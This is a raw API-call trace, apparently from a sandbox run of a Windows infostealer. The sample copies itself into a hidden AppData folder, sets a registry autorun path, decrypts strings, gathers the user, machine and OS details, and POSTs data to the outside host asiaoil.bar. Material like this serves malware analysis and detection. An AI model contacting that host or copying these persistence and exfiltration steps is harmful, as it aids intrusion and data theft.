0x740000 [0267.770] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0267.771] GetProcessHeap () returned 0x740000 [0267.771] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c478 | out: hHeap=0x740000) returned 1 [0267.775] GetProcessHeap () returned 0x740000 [0267.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5b0 | out: hHeap=0x740000) returned 1 [0267.775] GetProcessHeap () returned 0x740000 [0267.776] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 [0267.776] GetProcessHeap () returned 0x740000 [0267.776] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c1f0 | out: hHeap=0x740000) returned 1 [0267.932] GetProcessHeap () returned 0x740000 [0267.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x765ac0 [0268.029] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x765ac0, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe")) returned 0x2f [0268.030] GetProcessHeap () returned 0x740000 [0268.030] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x765ce8 [0268.030] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0268.032] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x765ce8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0268.032] GetProcessHeap () returned 0x740000 [0268.032] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f58) returned 0x767650 [0268.033] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0268.034] wvsprintfW (in: param_1=0x767650, param_2="%s\\%s\\%s.exe", arglist=0x19fd44 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0268.034] GetProcessHeap () returned 0x740000 [0268.034] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757298 [0268.034] GetProcessHeap () returned 0x740000 [0268.035] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0268.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0268.036] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0268.036] GetProcessHeap () returned 0x740000 [0268.037] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x767650 [0268.037] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0268.038] wvsprintfW (in: param_1=0x767650, param_2="%s\\%s", arglist=0x19fd60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0268.038] GetProcessHeap () returned 0x740000 [0268.038] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x763220 [0268.038] GetProcessHeap () returned 0x740000 [0268.039] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0268.039] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0268.041] MoveFileExW (lpExistingFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 1 [0268.043] GetProcessHeap () returned 0x740000 [0268.044] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x765f10 [0268.045] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0268.046] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x765f10 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0268.046] GetProcessHeap () returned 0x740000 [0268.046] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x767650 [0268.047] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0268.048] wvsprintfW (in: param_1=0x767650, param_2="%s\\%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0268.048] GetProcessHeap () returned 0x740000 [0268.048] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x763288 [0268.048] GetProcessHeap () returned 0x740000 [0268.049] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0268.049] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0268.049] GetProcessHeap () returned 0x740000 [0268.049] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f50) returned 0x767650 [0268.050] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0268.051] wvsprintfW (in: param_1=0x767650, param_2="%s\\%s.%s", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0268.051] GetProcessHeap () returned 0x740000 [0268.051] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757098 [0268.051] GetProcessHeap () returned 0x740000 [0268.051] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0268.051] GetProcessHeap () returned 0x740000 [0268.052] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763288 | out: hHeap=0x740000) returned 1 [0268.052] GetProcessHeap () returned 0x740000 [0268.052] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0268.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.195] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fcfc, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fd04 | out: pSid=0x19fd04*=0x75c358*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0268.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.196] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x75c358*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fd08 | out: IsMember=0x19fd08) returned 1 [0268.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.325] GetProcessHeap () returned 0x740000 [0268.325] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x60) returned 0x761fd0 [0268.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.327] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fc94*=0x0) returned 1 [0268.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.443] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fc94*=0x762038) returned 1 [0268.684] GetProcessHeap () returned 0x740000 [0268.684] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0268.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.685] CryptImportKey (in: hProv=0x762038, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fc98 | out: phKey=0x19fc98*=0x74d768) returned 1 [0268.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.686] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fc90*=0x1, dwFlags=0x0) returned 1 [0268.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.688] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0268.688] GetProcessHeap () returned 0x740000 [0268.688] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0268.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.815] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x761fd0, pdwDataLen=0x19fce8 | out: pbData=0x761fd0, pdwDataLen=0x19fce8) returned 1 [0268.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.820] CryptDestroyKey (hKey=0x74d768) returned 1 [0268.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.821] CryptReleaseContext (hProv=0x762038, dwFlags=0x0) returned 1 [0268.822] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x761fd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0268.822] GetProcessHeap () returned 0x740000 [0268.822] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x36) returned 0x74d368 [0268.822] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x761fd0, cbMultiByte=-1, lpWideCharStr=0x74d368, cchWideChar=27 | out: lpWideCharStr="�������ѝ���Н����Й���Й��я��") returned 27 [0268.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0268.823] SHRegSetPathW (hKey=0x80000001, pcszSubKey="�������ѝ���Н����Й���Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x0 [0268.825] GetProcessHeap () returned 0x740000 [0268.825] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74d368 | out: hHeap=0x740000) returned 1 [0268.825] GetProcessHeap () returned 0x740000 [0268.826] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x761fd0 | out: hHeap=0x740000) returned 1 [0268.826] GetProcessHeap () returned 0x740000 [0268.826] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757098 | out: hHeap=0x740000) returned 1 [0268.827] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0268.830] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0268.830] GetProcessHeap () returned 0x740000 [0268.831] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763220 | out: hHeap=0x740000) returned 1 [0268.831] GetProcessHeap () returned 0x740000 [0268.831] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757298 | out: hHeap=0x740000) returned 1 [0268.831] GetProcessHeap () returned 0x740000 [0268.832] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0268.832] GetProcessHeap () returned 0x740000 [0268.832] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2bc) returned 0x761fd0 [0268.832] GetProcessHeap () returned 0x740000 [0268.832] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x75c220 [0268.832] GetProcessHeap () returned 0x740000 [0268.832] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x11c) returned 0x762298 [0268.833] RtlGetVersion (in: lpVersionInformation=0x762298 | out: lpVersionInformation=0x762298*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0268.833] GetProcessHeap () returned 0x740000 [0268.833] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x762298 | out: hHeap=0x740000) returned 1 [0268.833] GetProcessHeap () returned 0x740000 [0268.833] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x766c00 [0268.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.835] GetUserNameW (in: lpBuffer=0x766c00, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0268.836] GetProcessHeap () returned 0x740000 [0268.837] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766c00 | out: hHeap=0x740000) returned 1 [0268.837] GetProcessHeap () returned 0x740000 [0268.837] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x765898 [0268.838] GetComputerNameW (in: lpBuffer=0x765898, nSize=0x19fed0 | out: lpBuffer="XC64ZB", nSize=0x19fed0) returned 1 [0268.838] GetProcessHeap () returned 0x740000 [0268.838] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0268.839] GetCurrentThread () returned 0xfffffffe [0268.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.841] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x0) returned 0 [0268.841] GetLastError () returned 0x3f0 [0268.841] GetCurrentProcess () returned 0xffffffff [0268.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x274) returned 1 [0268.843] GetProcessHeap () returned 0x740000 [0268.843] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x766360 [0268.843] GetProcessHeap () returned 0x740000 [0268.843] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x765ce8 [0268.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.939] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fecc | out: TokenInformation=0x0, ReturnLength=0x19fecc) returned 0 [0268.939] GetProcessHeap () returned 0x740000 [0268.939] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0268.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.940] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x758688, TokenInformationLength=0x24, ReturnLength=0x19fecc | out: TokenInformation=0x758688, ReturnLength=0x19fecc) returned 1 [0268.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0268.941] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x758690*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x766360, cchName=0x19febc, ReferencedDomainName=0x765ce8, cchReferencedDomainName=0x19fec0, peUse=0x19feb8 | out: Name="RDhJ0CNFevzX", cchName=0x19febc, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fec0, peUse=0x19feb8) returned 1 [0268.944] GetProcessHeap () returned 0x740000 [0268.944] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x767650 [0268.944] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0268.945] wvsprintfW (in: param_1=0x767650, param_2="%s", arglist=0x19fea8 | out: param_1="XC64ZB") returned 6 [0268.945] GetProcessHeap () returned 0x740000 [0268.945] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c1f0 [0268.945] GetProcessHeap () returned 0x740000 [0268.946] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0268.946] GetProcessHeap () returned 0x740000 [0268.946] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0268.946] CloseHandle (hObject=0x274) returned 1 [0268.946] GetProcessHeap () returned 0x740000 [0268.947] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0268.947] GetProcessHeap () returned 0x740000 [0268.947] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766360 | out: hHeap=0x740000) returned 1 [0268.947] GetProcessHeap () returned 0x740000 [0268.947] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c1f0 | out: hHeap=0x740000) returned 1 [0268.948] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0268.949] GetDesktopWindow () returned 0x10010 [0268.949] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0269.075] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fec8 | out: lpRect=0x19fec8) returned 1 [0269.075] GetProcessHeap () returned 0x740000 [0269.075] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8) returned 0x75b4e0 [0269.075] GetProcessHeap () returned 0x740000 [0269.075] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4e0 | out: hHeap=0x740000) returned 1 [0269.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.077] GetUserNameW (in: lpBuffer=0x19fcc8, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0269.078] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x755e0000 [0269.079] GetProcAddress (hModule=0x755e0000, lpProcName="NetUserGetInfo") returned 0x67df33a0 [0269.080] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fed4 | out: bufptr=0x763e48*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xc459c6, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0269.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.094] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fec0, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fec8 | out: pSid=0x19fec8*=0x75c250*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0269.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.095] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x75c250*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fecc | out: IsMember=0x19fecc) returned 1 [0269.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.249] GetNativeSystemInfo (in: lpSystemInfo=0x19fea4 | out: lpSystemInfo=0x19fea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0269.249] GetProcessHeap () returned 0x740000 [0269.249] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0269.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.250] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.257] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x756098) returned 1 [0269.345] GetProcessHeap () returned 0x740000 [0269.345] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0269.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.346] CryptImportKey (in: hProv=0x756098, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0269.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.347] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.348] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.348] GetProcessHeap () returned 0x740000 [0269.349] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0269.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.350] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0269.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.350] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0269.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0269.351] CryptReleaseContext (hProv=0x756098, dwFlags=0x0) returned 1 [0269.351] GetProcessHeap () returned 0x740000 [0269.351] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766360 [0269.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0269.352] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0269.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0269.353] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0269.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0269.354] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0269.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0269.355] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0269.355] GetProcessHeap () returned 0x740000 [0269.355] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf30 [0269.355] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c098*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be90*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0269.359] GetProcessHeap () returned 0x740000 [0269.359] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b620 [0269.359] socket (af=2, type=1, protocol=6) returned 0x270 [0269.360] connect (s=0x270, name=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0269.490] FreeAddrInfoW (pAddrInfo=0x75c098*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be90*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0269.490] GetProcessHeap () returned 0x740000 [0269.490] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x7562c0 [0269.490] GetProcessHeap () returned 0x740000 [0269.490] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x75ca78 [0269.491] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0269.504] wvsprintfA (in: param_1=0x75ca78, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0269.505] GetProcessHeap () returned 0x740000 [0269.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75eaa0 [0269.505] GetProcessHeap () returned 0x740000 [0269.505] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0269.505] GetProcessHeap () returned 0x740000 [0269.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763f20 [0269.505] GetProcessHeap () returned 0x740000 [0269.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x75ca78 [0269.506] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0269.507] wvsprintfA (in: param_1=0x75ca78, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0269.507] GetProcessHeap () returned 0x740000 [0269.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x75eb60 [0269.507] GetProcessHeap () returned 0x740000 [0269.508] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0269.508] send (s=0x270, buf=0x75eb60*, len=243, flags=0) returned 243 [0269.508] send (s=0x270, buf=0x761fd0*, len=159, flags=0) returned 159 [0269.509] GetProcessHeap () returned 0x740000 [0269.509] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75ca78 [0269.509] recv (in: s=0x270, buf=0x75ca78, len=4048, flags=0 | out: buf=0x75ca78*) returned 573 [0269.631] GetProcessHeap () returned 0x740000 [0269.632] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75eb60 | out: hHeap=0x740000) returned 1 [0269.632] GetProcessHeap () returned 0x740000 [0269.632] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0269.632] GetProcessHeap () returned 0x740000 [0269.632] HeapFree (in: 